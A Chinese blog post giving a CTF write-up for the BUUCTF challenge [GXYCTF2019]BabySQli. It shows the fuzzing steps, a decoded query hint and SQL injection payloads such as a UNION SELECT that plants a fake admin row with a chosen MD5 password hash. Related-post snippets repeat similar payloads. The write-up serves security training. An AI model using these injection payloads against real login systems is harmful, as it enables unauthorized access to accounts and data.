【BUUCTF-Web】[GXYCTF2019]BabySQli

于 2023-01-05 15:15:28 发布
阅读量143 收藏
点赞数
文章标签: java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49298681/article/details/128563955
版权

Subject

SQL Fuzz

Mind Palace

回显:do not hack me ==> 有过滤机制 ==> fuzz一下看看有什么是被过滤的了

OR updatexml 没有被过滤 ==> 尝试报错注入

admin' OR updatexml(1,database(),1);# ==> 失败

左右括号被过滤了

MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5
所以这是个啥emm;在线网站解密失败

这里的一串注释的内容意义不明;;base32/64? or md5?

不过通过回显知道了username = admin

1' order by 3(1,2,3,4..) ==> 判断出有三列

1' union select 1,2,3;# ==> wrong user
1' union select 'admin',2,3;# ==> wrong user
1' union select 1,'admin',3;# ==> wrong pass!

说明第二个字段就是username字段;猜测第一个是id 第三个是password

而且通过知道了admin为username的情况下也没有能绕过什么的1' OR 1 <> 2;# 说明username和password是分开判断的 ==> username判断成功后还需要再单独判断password是否是正确的

猜测的代码
$pass = $_POST['pw'];
if ($_POST['name'] == 'admin') {if ($_POST['pw'] == md5($pass)) {echo $flag;}
} 

username = 1' union select 1,'admin','md5(eclipse)';#
md5(eclipse) => 6b7b655dd22faa3f10677c512493a8a0
password = eclipse

登陆后获得flag

Look Ahead

通过回显猜测代码

MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5
这里肯定是提示 ==> 查询后得知是base32解+base64解码 

encoded_txt = "MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5"
print(base64.b64decode(base64.b32decode(encoded_txt)))

==> Output:
b"select * from user where username = '$name'"

根据源码提示知道查询正常情况下是这样的:

之后再拿查询出来的pw和用户POST的pw的md5加密的值进行比较;由此在知道了1,2,3列回显情况后,可以构造如下payload:

输入的密码为text即可得到flag值

END (*≧∪≦)

高了个原
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF WEB Babysqli1
qq_41696858的博客
10-18 194
这题考的是sql注入 打开场景,一个登录界面 先尝试下,admin’,根据回显判断,用户名是admin没错,而且是单引号闭合 尝试万能密码,admin’ or ‘1’=‘1,发现是don’t hack me看来是有waf 但是尝试union这类词,发现他能过waf,那么尝试联合注入看看 首先要确定列数,不幸的是order触发了waf,需要大小写绕过 admin’ Order by 3#和admin’ Order by4#回显不一样,那么可以确认是三列 下面确定admin在那一列, a’ union sele
BUUCTF WEB [GXYCTF2019]BabySQli
Y1da的博客
04-18 744
BUUCTF WEB [GXYCTF2019]BabySQli 手工注入 这里需要利用sqli的一个特性:在联合查询并不存在的数据时,联合查询会构造一个虚拟的数据 假设联合查询前表结构如下 id name password 1 tom 123456 此时执行联合查询 select * from 'users' where name='admin' union select 2,'admin','123'; 表结构将会变成 id name password 1
web buuctf [GXYCTF2019]BabySQli1
weixin_44214568的博客
03-18 1429
知识点:联合注入(当联合查询不存在时,联合查询就会构造一个虚拟的数据) 1.尝试在用户和密码选项中分别进行注入,1' or '1=1'# ;1 or 1=1#;。。。都无法注入 2.再输入1',用户一栏存在报错,且输入为字符型,尝试报错注入,也不行(可以用bp的fuzz,效率高点,根据response,能够知道or和()都被过滤了); 3.级联注入:在用户栏输入1' union select 1,2# 报错Error: The used SELECT statements have a differ
buuctf babysqli
weixin_55567437的博客
07-15 109
从这条信息可以知道这是base32码,解码得到一个base64码 解码得到一个: select * from user where username = '".$name."' 不能得到有用的信息但通过题目源码得知password被md5加密了 所以得找个办法绕过加密。构建一个payload虚拟身份绕过审核机制。 通过burp suite 并构建一个name=1' union select 1,'admin','.......'#pw=123 '......'就是123的...
buuctf BabySQli
qq_44111753的博客
01-02 1033
随便输入,发现一串密文,数字+大写字母,大概是采用base32加密 base32解密如下,有“=”,猜测是base64加密 base64解密如下 查询后台数据库username等于输入值得所有数据 后台数据库的登录逻辑大概是:将输入的用户名与后台数据库中的所有用户名做比较,找出相等的,然后用这组数据的密码与用户输入的密码作比较,若相等,则登录成功 重要点:放置于后台的数据库大概率是经过hash加密的 操作:在用户名框注入 1’ union select ‘admin’,加密后的密码 为了使登录成功,注入
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
【变量覆盖漏洞详解】 ...这类漏洞通常出现在以下几种情况: 1. **全局变量覆盖**: ...攻击者可以通过操纵这些请求参数来覆盖预定义的变量,造成安全风险。... ...2. **extract()函数使用不当**: `extract()`函数会从数组中...
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF-MISC-WP(详细解题思路)
01-27
BUUCTF-MISC-WP(详细解题思路)
BUUCTF部分web题目
最新发布
05-06
写题记录
BUUCTFweb之强网杯2019随便注
12-14
开始注入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: ...
BUU-WEB-[GXYCTF2019]BabySQli
qq_24033605的博客
05-15 388
[GXYCTF2019]BabySQli 一个登录界面,源码中没有任何提示信息,只告诉我们用户名和密码是以POST形式提交。 尝试实验登录。 发现一串base编码的密文。 base32 => base64解码得到: select * from user where username = '$name' 尝试闭合username,之后爆破出字段长度。 根据爆破,得出字段长度为3。 (这里的order被过滤了,于是尝试使用大写就可以绕过了) 尝试使用admin替代字段。 得到第二个字段为注入点。
web-[GXYCTF2019]BabySQli
wojiushilsy的博客
07-06 297
题目要点题目内容解题 题目要点 当查询的数据不存在的时候,联合查询就会构造一个虚拟的数据。 题目内容 解题 原题目描述:刚学完sqli,我才知道万能口令这么危险,还好我进行了防护,还用md5哈希了密码! 查看源码search.php看到MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5 base32+base64解密后得到select * from user .
[GXYCTF2019]BabySQli
m0_62092622的博客
04-12 1154
​ 这题也是够简陋的了 先随便输入一个账号密码,然后显示wrong user 当账号为admin时,显示wrong pass 查看源码发现一串字符 MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5 先base32编码再base64编码可以得到 select * from user where username = '$name' 在UserName中
GXYCTF2019BabySQLi wp
Luminous_song的博客
09-28 289
打开容器后发现,只是一个登录页面 这种登录一般都是admin为用户名,再随便输个密码,发现出现wrong pass打开源代码,发现一行注释 <!--MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5--> 先用base64解密一次,发现是乱码,再用base32,解出来出现两个等号,有base64的特征,再次用base64解密,发现 select * f
BUUCTF 个人做题记录【6-6】
qq_61620566的博客
06-06 357
一个ctf的成长记录
BUU Web[29-32]
qq_41513009的博客
09-29 689
BUU Web[29-32]
php33669,GXYCTF部分详细题解
weixin_39593744的博客
03-16 332
原创: 紫色仰望 合天智汇0x00:GXYCTF部分详细题解2019GXYCTF结束,这里我写下较详细的部分题解,希望可以帮到大家!0x01:baby_sqli进来后是一个 登录页面首先 尝试下admin123登录,然后查看 源代码,发现一串很可疑的字符串尝试了下,发现是base32编码MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSC...
[GXYCTF2019]BabySQli 解题思路&过程
iamblackcat's blog
10-19 4740
[GXYCTF2019]BabySQli 解题思路&过程
buuctf-强网杯2019随便注
09-03
buuctf-强网杯2019随便注是一场2019年强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与注入漏洞相关的题目。 注入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中注入恶意代码来获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值